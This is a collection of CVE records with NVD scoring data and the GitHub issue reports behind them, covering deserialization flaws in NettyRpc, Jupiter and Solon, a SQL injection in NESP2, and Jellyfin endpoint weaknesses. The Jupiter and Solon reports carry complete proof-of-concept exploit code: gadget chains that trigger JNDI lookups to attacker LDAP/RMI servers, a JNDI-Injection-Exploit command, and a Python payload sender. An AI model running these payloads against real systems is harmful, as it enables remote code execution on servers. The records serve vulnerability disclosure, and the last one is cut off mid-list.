invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel) invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel) fireChannelRead:931, DefaultChannelPipeline (io.netty.channel) read:163, AbstractNioByteChannel$NioByteUnsafe (io.netty.channel.nio) processSelectedKey:700, NioEventLoop (io.netty.channel.nio) processSelectedKeysOptimized:635, NioEventLoop (io.netty.channel.nio) processSelectedKeys:552, NioEventLoop (io.netty.channel.nio) run:514, NioEventLoop (io.netty.channel.nio) run:1044, SingleThreadEventExecutor$6 (io.netty.util.concurrent) run:74, ThreadExecutorMap$2 (io.netty.util.internal) run:30, FastThreadLocalRunnable (io.netty.util.concurrent) run:745, Thread (java.lang) ``` ## Analysis ### Trigger 1. In RpcDecoder, the default deserialization method is Kryo: ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/420967bc-5848-4cf3-8481-53a0dae008ac) 2. Subsequently, KryoSerializer receives the object from com.netty.rpc.codec.RpcRequest (our malicious object) and places it into deserialization without conducting any security checks: ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/17bb31a8-11c1-440b-962a-b84bbbf1e400) 3. The process then follows the CommonsBeanutils gadget: ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/046e7d7e-9b7d-43c5-b1c6-6058dd9a857b) # Remediation Recommendations **1. Upgrade Kryo to Version 5.0 or Higher:** Upgrade the Kryo library to version 5.0 or a later release to benefit from the latest security enhancements and bug fixes. **2. Strict Outbound Internet Access Control** Due to the prevalence of known attack vectors leveraging JDNI injection to achieve Remote Code Execution (RCE), which requires the remote loading of malicious classes, it is recommended, where feasible without impacting business operations, to implement strict outbound internet access controls on server configurations. **3. Restriction of Access to Server** It is advisable to restrict external access to the server either by utilizing whitelist IP configurations or by closing public-facing ports. This measure aims to reduce the attack surface and potential risks associated with external access to the server. **4. Implementation of Whitelists/Blacklists for Serialization/Deserialization Classes** Establishing whitelists or blacklists for serialization/deserialization classes within the serialization protocol is recommended. This helps to restrict the deserialization of malicious classes. However, it is important to note that using a blacklist may introduce the risk of potential bypasses.
Kryo Deserialization Vulnerability in NettyRpc 1.2
https://api.github.com/repos/luxiaoxun/NettyRpc/issues/53/comments
0
2023-12-01T02:23:13Z
2023-12-01T02:23:13Z
https://github.com/luxiaoxun/NettyRpc/issues/53
2,019,920,057
53
5,784
CVE-2023-48887
2023-12-01T23:15:07.967
A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/fengjiachun/Jupiter" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/fengjiachun/Jupiter/issues/115" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/fengjiachun/Jupiter" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/fengjiachun/Jupiter/issues/115" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fengjiachun:jupiter:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "E43B5331-436C-4FB7-86F3-3CFC618F4E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/fengjiachun/Jupiter/issues/115
[ "Exploit" ]
github.com
[ "fengjiachun", "Jupiter" ]
# Describe the Vulnerability A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request. # Environment - Jupiter version: v1.3.1 - JVM version: JDK 1.8(Tested on JDK 1.8.0_65) # Preparation for Vulnerability Verification 1. There is an additional method named "sayObject" in the service ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/e9af3a84-a03a-488b-b9bf-a070160b69d6) ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/cb0f8a1e-3d30-4c1a-929c-94454bb2ac1d) 2. The application has dependencies on commons-collections and commons-beanutils. ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/80b6a0ad-6b17-4a4e-b1eb-cd221d6df518) 3. Remote class loading is allowed (either because an old JDK version is being used(eg. 8u65 in this paper), or by using the JVM argument -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) # Exploit and Analysis ## POC 1. Obtain the JNDI injection tool from: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 2. Use the following command below to establish a JNDI link java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/b149c555-bb98-443d-b730-bcbc315d80a5) 3. Paste the provided POC code below into the project, ensuring to modify the JNDI URL address! Also, Modify the SerializerType to be Kryo. ```java package org.jupiter.example.non.annotation; import org.jupiter.common.util.SystemPropertyUtil; import org.jupiter.example.ServiceNonAnnotationTest; import org.jupiter.rpc.DefaultClient; import org.jupiter.rpc.JClient; import org.jupiter.rpc.consumer.ProxyFactory; import org.jupiter.rpc.model.metadata.ServiceMetadata; import org.jupiter.serialization.SerializerType; import org.jupiter.transport.JConnector; import org.jupiter.transport.exception.ConnectFailedException; import org.jupiter.transport.netty.JNettyTcpConnector; import com.sun.rowset.JdbcRowSetImpl; import org.apache.commons.beanutils.BeanComparator; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.util.Collections; import java.util.Comparator; import java.util.TreeMap; public class CB_RCE_Client { public static void main(String[] args) throws Exception { // Modify the JNDIURL here!! String jndiUrl = "ldap://169.254.197.239:1389/a43idy"; SystemPropertyUtil.setProperty("jupiter.message.args.allow_null_array_arg", "true"); SystemPropertyUtil.setProperty("jupiter.serializer.protostuff.allow_null_array_element", "true"); final JClient client = new DefaultClient().withConnector(new JNettyTcpConnector()); // 连接RegistryServer client.connectToRegistryServer("127.0.0.1:20001"); // 自动管理可用连接 JConnector.ConnectionWatcher watcher = client.watchConnections( new ServiceMetadata("test", "org.jupiter.example.ServiceNonAnnotationTest", "1.0.0") ); // 等待连接可用 if (!watcher.waitForAvailable(3000)) { throw new ConnectFailedException(); } Runtime.getRuntime().addShutdownHook(new Thread(client::shutdownGracefully)); ServiceNonAnnotationTest service = ProxyFactory.factory(ServiceNonAnnotationTest.class) .group("test") .providerName("org.jupiter.example.ServiceNonAnnotationTest") .version("1.0.0") .client(client) // Modify the SerializerType to be Kryo here!! .serializerType(SerializerType.KRYO) .newProxyInstance(); BeanComparator cmp = new BeanComparator("lowestSetBit", Collections.reverseOrder()); Object trig = makeTreeMap(makeJNDIRowSet(jndiUrl), cmp); setFieldValue(cmp, "property", "databaseMetaData"); try { service.sayObject(trig); } catch (Exception e) { e.printStackTrace(); } } public static TreeMap<Object, Object> makeTreeMap (Object tgt, Comparator comparator ) throws Exception { TreeMap<Object, Object> tm = new TreeMap<>(comparator); Class<?> entryCl = Class.forName("java.util.TreeMap$Entry"); Constructor<?> entryCons = entryCl.getDeclaredConstructor(Object.class, Object.class, entryCl); entryCons.setAccessible(true); Field leftF = getField(entryCl, "left"); Field rootF = getField(TreeMap.class, "root"); Object root = entryCons.newInstance(tgt, tgt, null); leftF.set(root, entryCons.newInstance(tgt, tgt, root)); rootF.set(tm, root); setFieldValue(tm, "size", 2); return tm; } public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception { try { Field field = clazz.getDeclaredField(fieldName); if ( field != null ) field.setAccessible(true); else if ( clazz.getSuperclass() != null ) field = getField(clazz.getSuperclass(), fieldName); return field; } catch ( NoSuchFieldException e ) { if ( !clazz.getSuperclass().equals(Object.class) ) { return getField(clazz.getSuperclass(), fieldName); } throw e; } } public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } public static JdbcRowSetImpl makeJNDIRowSet (String jndiUrl ) throws Exception { JdbcRowSetImpl rs = new JdbcRowSetImpl(); rs.setDataSourceName(jndiUrl); rs.setMatchColumn("foo"); getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null); return rs; } } ``` 4. Run Server and RegistryServer in the "org.jupiter.example.non.annotation" package ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/e2391ee6-3f6f-4009-9036-c83438ff7768) 5. Finally, run the POC code, and examine the obtained result: ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/38eaa172-72d5-45dd-925e-c2d05f1691f9) 6. Stack Trace: ```java lookup:417, InitialContext (javax.naming) connect:624, JdbcRowSetImpl (com.sun.rowset) getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset) invoke0:-1, NativeMethodAccessorImpl (sun.reflect) invoke:62, NativeMethodAccessorImpl (sun.reflect) invoke:43, DelegatingMethodAccessorImpl (sun.reflect) invoke:497, Method (java.lang.reflect) invokeMethod:2170, PropertyUtilsBean (org.apache.commons.beanutils) getSimpleProperty:1332, PropertyUtilsBean (org.apache.commons.beanutils) getNestedProperty:770, PropertyUtilsBean (org.apache.commons.beanutils) getProperty:846, PropertyUtilsBean (org.apache.commons.beanutils) getProperty:426, PropertyUtils (org.apache.commons.beanutils) compare:157, BeanComparator (org.apache.commons.beanutils) compare:1291, TreeMap (java.util) put:538, TreeMap (java.util) read:140, MapSerializer (com.esotericsoftware.kryo.serializers) read:17, MapSerializer (com.esotericsoftware.kryo.serializers) readObject:685, Kryo (com.esotericsoftware.kryo) read:378, DefaultArraySerializers$ObjectArraySerializer (com.esotericsoftware.kryo.serializers) read:289, DefaultArraySerializers$ObjectArraySerializer (com.esotericsoftware.kryo.serializers) readObject:685, Kryo (com.esotericsoftware.kryo) read:106, ObjectField (com.esotericsoftware.kryo.serializers) read:482, FieldSerializer (com.esotericsoftware.kryo.serializers) readObject:663, Kryo (com.esotericsoftware.kryo) readObject:106, KryoSerializer (org.jupiter.serialization.kryo) run:114, MessageTask (org.jupiter.rpc.provider.processor.task) runWorker:1142, ThreadPoolExecutor (java.util.concurrent) run:617, ThreadPoolExecutor$Worker (java.util.concurrent) run:745, Thread (java.lang) ``` ## Analysis ### Trigger 1. In MessageTask.run(), as we have set the Serializer to be Kryo: ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/4d241232-463b-4552-beff-ea0850b5fdba) 2. Subsequently, KryoSerializer receives the object from client and places it into deserialization without conducting any security checks: ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/85299645-5e3e-4f70-a6b7-eb7d318b3189) 3. The process then follows the CommonsBeanutils gadget: ![image](https://github.com/fengjiachun/Jupiter/assets/46960004/50288d2b-79d6-45dd-9139-9a7ac2cedd17) # Remediation Recommendations **1. Upgrade Kryo to Version 5.0 or Higher:** Upgrade the Kryo library to version 5.0 or a later release to benefit from the latest security enhancements and bug fixes. **2. Strict Outbound Internet Access Control** Due to the prevalence of known attack vectors leveraging JDNI injection to achieve Remote Code Execution (RCE), which requires the remote loading of malicious classes, it is recommended, where feasible without impacting business operations, to implement strict outbound internet access controls on server configurations. **3. Restriction of Access to Server** It is advisable to restrict external access to the server either by utilizing whitelist IP configurations or by closing public-facing ports. This measure aims to reduce the attack surface and potential risks associated with external access to the server. **4. Implementation of Whitelists/Blacklists for Serialization/Deserialization Classes** Establishing whitelists or blacklists for serialization/deserialization classes within the serialization protocol is recommended. This helps to restrict the deserialization of malicious classes. However, it is important to note that using a blacklist may introduce the risk of potential bypasses.
Kryo Deserialization Vulnerability in Jupiter v1.3.1
https://api.github.com/repos/fengjiachun/Jupiter/issues/115/comments
0
2023-12-01T02:14:00Z
2023-12-01T02:14:00Z
https://github.com/fengjiachun/Jupiter/issues/115
2,019,911,389
115
5,785
CVE-2020-36768
2023-12-03T11:15:08.443
A vulnerability was found in rl-institut NESP2 Initial Release/1.0. It has been classified as critical. Affected is an unknown function of the file app/database.py. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 07c0cdf36cf6a4345086d07b54423723a496af5e. It is recommended to apply a patch to fix this issue. VDB-246642 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/rl-institut/NESP2/commit/07c0cdf36cf6a4345086d07b54423723a496af5e" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/rl-institut/NESP2/issues/334" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/rl-institut/NESP2/pull/333" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.246642" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.246642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/rl-institut/NESP2/commit/07c0cdf36cf6a4345086d07b54423723a496af5e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/rl-institut/NESP2/issues/334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/rl-institut/NESP2/pull/333" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.246642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.246642" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:reiner-lemoine-institut:nesp2:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FCEB5AF1-39EE-4BAE-9D86-794A3A76FFD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/rl-institut/NESP2/issues/334
[ "Issue Tracking", "Patch" ]
github.com
[ "rl-institut", "NESP2" ]
Hi, just passing by, but noticed (at least one) sql injection issue in https://github.com/rl-institut/NESP2/blob/a82e6ce7ae6e81b2a1e08a31858399839c0fdf81/app/database.py#L66 user-controlled data is used without escaping in a raw sql query. I suggest either to use the orm layer, or maybe one of ``` table = Table('table', metadata, autoload = True, autoload_with = engine) s=table.select().where(Column('blub') == usercontrolled1).where(Column('muh') == usercontrolled2) ``` or ``` filter=['blub = :value1', 'blub2 = :value1'] values={'value1':usercontrolled1,'value2':usercontrolled2} sql = 'select * from table where' + 'and'.join(filter) result = connection.execute(sql, **values) ``` should make sqlalchemy escape the input. The severity of this issue depends on the sql server configuration, I don't want to set up a local test environment
possible sql injection
https://api.github.com/repos/rl-institut/NESP2/issues/334/comments
6
2020-11-05T00:24:25Z
2020-11-05T13:06:23Z
https://github.com/rl-institut/NESP2/issues/334
736,512,310
334
5,786
CVE-2023-48967
2023-12-04T17:15:07.190
Ssolon <= 2.6.0 and <=2.5.12 is vulnerable to Deserialization of Untrusted Data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/noear/solon/issues/226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/noear/solon/issues/226" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:noear:solon:*:*:*:*:*:*:*:*", "matchCriteriaId": "BD386ABC-5F19-4CAA-8AD4-795101461DE6", "versionEndExcluding": null, "versionEndIncluding": "2.5.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:noear:solon:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "3127EF1E-BD64-4674-BBB9-CD714B8FA926", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/noear/solon/issues/226
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "noear", "solon" ]
### Issue Description We recently discovered that Solon provides 'Fury' as a serialization and deserialization solution for RPC. However, our research has found that the corresponding component has a security vulnerability. Attackers can execute a JNDI injection attack using a carefully constructed attack payload. ### Vulnerability Localization ![351581700132100_ pic](https://github.com/noear/solon/assets/149687736/4e56f37f-2842-404e-af86-6d5f20e0d954) The vulnerability is located at line 25 of the `org.noear.solon.serialization.fury.FuryActionExecutor` class, as shown in the figure above. Although Fury provides a built-in blacklist to defend against potential deserialization attacks, we will next demonstrate how to bypass this blacklist to carry out an attack. ### Vulnerability Reproduction ##### Configuring the RPC Service Issue #145 has already provided a simple configuration for an RPC server. We just need to add the following dependencies in the pom.xml file: ``` <dependency> <groupId>org.noear</groupId> <artifactId>solon.serialization.fury</artifactId> <version>2.6.0</version> </dependency> <dependency> <groupId>com.caucho</groupId> <artifactId>quercus</artifactId> <version>4.0.66</version> </dependency> ``` ##### Configuring a Malicious LDAP Server We use `ysoserial`(https://github.com/frohoff/ysoserial) to set up a malicious LDAP server for subsequent JNDI injection attacks(Note that in this instance, we are demonstrating using the well-known exploit chain CommonsCollections2. To achieve a similar effect, please configure the corresponding dependencies on the RPC server side.). ![351591700132115_ pic](https://github.com/noear/solon/assets/149687736/986afb12-49a8-4d98-b37b-4ed8f02430a4) ### Proof of Concept We can obtain the serialized data required for the attack through the following PoC (Proof of Concept). ``` RegistryContext registryContext = new RegistryContext("127.0.0.1", 8989, null); MemoryModel memoryModel = new MemoryModel(); memoryModel.bind("evil", registryContext); ContextImpl context = new ContextImpl("rmi://localhost:8888/8tr4qv", memoryModel, null); Constructor c = QBindingEnumeration.class.getDeclaredConstructors()[0]; c.setAccessible(true); ArrayList<String> list = new ArrayList<>(); list.add("/evil/8tr4qv"); QBindingEnumeration enumeration = (QBindingEnumeration) c.newInstance(context, list); XStringForFSB xString = Reflections.createWithoutConstructor(XStringForFSB.class); Reflections.setFieldValue(xString, "m_strCache", "nxjkas"); HashMap map1 = new HashMap(); HashMap map2 = new HashMap(); map1.put("yy",enumeration); map1.put("zZ",xString); map2.put("yy",xString); map2.put("zZ",enumeration); HashMap s = new HashMap(); setFieldValue(s, "size", 2); Class nodeC; try { nodeC = Class.forName("java.util.HashMap$Node"); } catch ( ClassNotFoundException e ) { nodeC = Class.forName("java.util.HashMap$Entry"); } Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); nodeCons.setAccessible(true); Object tbl = Array.newInstance(nodeC, 2); Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null)); Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null)); setFieldValue(s, "table", tbl); byte[] poc = FuryUtil.fury.serialize(s); new FileOutputStream(new File("/tmp/serifury")).write(poc); ``` Subsequently, we can use the Python script below to send the malicious serialized data to the server, completing the exploitation (this Python script is also referenced from Issue #145). ``` with open("/tmp/serifury","rb") as f: body= f.read() print(len(body)) burp0_url = "http://127.0.0.1:8080/rpc/v1/user/getUser" burp0_cookies = {"_jpanonym": "\"OWQ0ZTEzNzBlMWFlYTY2NzhhMDMxOWM5MmYzMjc0MzgjMTY2NTU2NDE1MzAwOCMzMTUzNjAwMCNPR1ZpTkRVd05qWXpZbU0xTkRCaU0yRXlabVpoTlRrek5HUXpabVk1TmpJPQ==\"", "Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a": "1665564182"} ct = "application/fury" burp0_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "deflate", "Connection": "close", "Content-Type": ct, "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1"} res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=body, proxies=proxy) print(res.text) ``` ### Attack Results ![351601700132123_ pic](https://github.com/noear/solon/assets/149687736/d47fac7d-7af9-4f97-8e06-cfef8676f49a)
A new RCE vulnerability
https://api.github.com/repos/opensolon/solon/issues/226/comments
4
2023-11-16T11:03:17Z
2025-03-31T03:44:33Z
https://github.com/opensolon/solon/issues/226
1,996,605,274
226
5,787
CVE-2023-49096
2023-12-06T20:15:07.287
Jellyfin is a Free Software Media System for managing and streaming media. In affected versions there is an argument injection in the VideosController, specifically the `/Videos/<itemId>/stream` and `/Videos/<itemId>/stream.<container>` endpoints which are present in the current Jellyfin version. Additional endpoints in the AudioController might also be vulnerable, as they differ only slightly in execution. Those endpoints are reachable by an unauthenticated user. In order to exploit this vulnerability an unauthenticated attacker has to guess an itemId, which is a completely random GUID. It’s a very unlikely case even for a large media database with lots of items. Without an additional information leak, this vulnerability shouldn’t be directly exploitable, even if the instance is reachable from the Internet. There are a lot of query parameters that get accepted by the method. At least two of those, videoCodec and audioCodec are vulnerable to the argument injection. The values can be traced through a lot of code and might be changed in the process. However, the fallback is to always use them as-is, which means we can inject our own arguments. Those arguments land in the command line of FFmpeg. Because UseShellExecute is always set to false, we can’t simply terminate the FFmpeg command and execute our own. It should only be possible to add additional arguments to FFmpeg, which is powerful enough as it stands. There is probably a way of overwriting an arbitrary file with malicious content. This vulnerability has been addressed in version 10.8.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.5, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Not Applicable" ], "url": "https://cwe.mitre.org/data/definitions/88.html" }, { "source": "security-advisories@github.com", "tags": [ "Not Applicable" ], "url": "https://en.wikipedia.org/wiki/Pass_the_hash" }, { "source": "security-advisories@github.com", "tags": [ "Not Applicable" ], "url": "https://ffmpeg.org/ffmpeg-filters.html#drawtext-1" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/jellyfin/jellyfin/commit/a656799dc879d16d21bf2ce7ad412ebd5d45394a" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jellyfin/jellyfin/issues/5415" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jellyfin/jellyfin/security/advisories/GHSA-866x-wj5j-2vf4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://cwe.mitre.org/data/definitions/88.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://en.wikipedia.org/wiki/Pass_the_hash" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://ffmpeg.org/ffmpeg-filters.html#drawtext-1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/jellyfin/jellyfin/commit/a656799dc879d16d21bf2ce7ad412ebd5d45394a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jellyfin/jellyfin/issues/5415" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jellyfin/jellyfin/security/advisories/GHSA-866x-wj5j-2vf4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*", "matchCriteriaId": "93D6F598-55D9-4041-BED8-4448226B5EFF", "versionEndExcluding": "10.8.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "88" ]
88
https://github.com/jellyfin/jellyfin/issues/5415
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jellyfin", "jellyfin" ]
# Collection of *potential* security issues in Jellyfin This is a non exhaustive list of *potential* security issues found in Jellyfin. Some of these might cause controversy. Some of these are design flaws and require breaking changes to correct them. I tried to categorize the issues in general topics. Expansions of this list are welcome. Most of the items on this list are not meant for immediate fixing, but rather for long term planning with a 11.0+ future release in mind, where significant (breaking) changes are allowed. My intention is not to highlight why these issues are here, but what could be done to improve the situation. ## Unauthenticated endpoints - ~~#5689 WebSocket connection doesn't require authentication~~ - #1501 Video streams completely unauthenticated (VideosController, HlsSegmentController, ~~LiveTVController~~) - Summary: The current implementation allows direct play without authentication. Transcoded media is partially authenticated (old HLS only has metadata protection, new HLS protects all). The Jellyfin web client *does* provide an api_key parameter in the URL for ~~all~~ some stream types<sup>1</sup>, but it isn't checked. - HlsSegmentController has a comment saying "Can't require authentication just yet due to seeing some requests come from Chrome without full query string" - ~~This also applied to streams in LiveTvController endpoints. Those are also not authenticated.~~ Update: Appears to be resolved in 10.8.9 - Potential fix: Require authentication on all video streams, both direct streams as well as any transcoded media. - "Gets subtitles in a specified format" and "Gets subtitles in a specified format" (SubtitleController) endpoints are unauthenticated - Allows anyone who is able to retrieve the item id to download subtitles, even if not logged in - Potential fix: Authenticate both endpoints - All endpoints in AudioController are unauthenticated - Has a comment saying "TODO: In order to authenticate this in the future, Dlna playback will require updating" - 